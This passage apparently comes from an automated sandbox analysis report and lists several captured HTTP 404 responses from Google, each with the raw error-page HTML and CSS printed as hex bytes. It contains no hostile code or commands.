6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
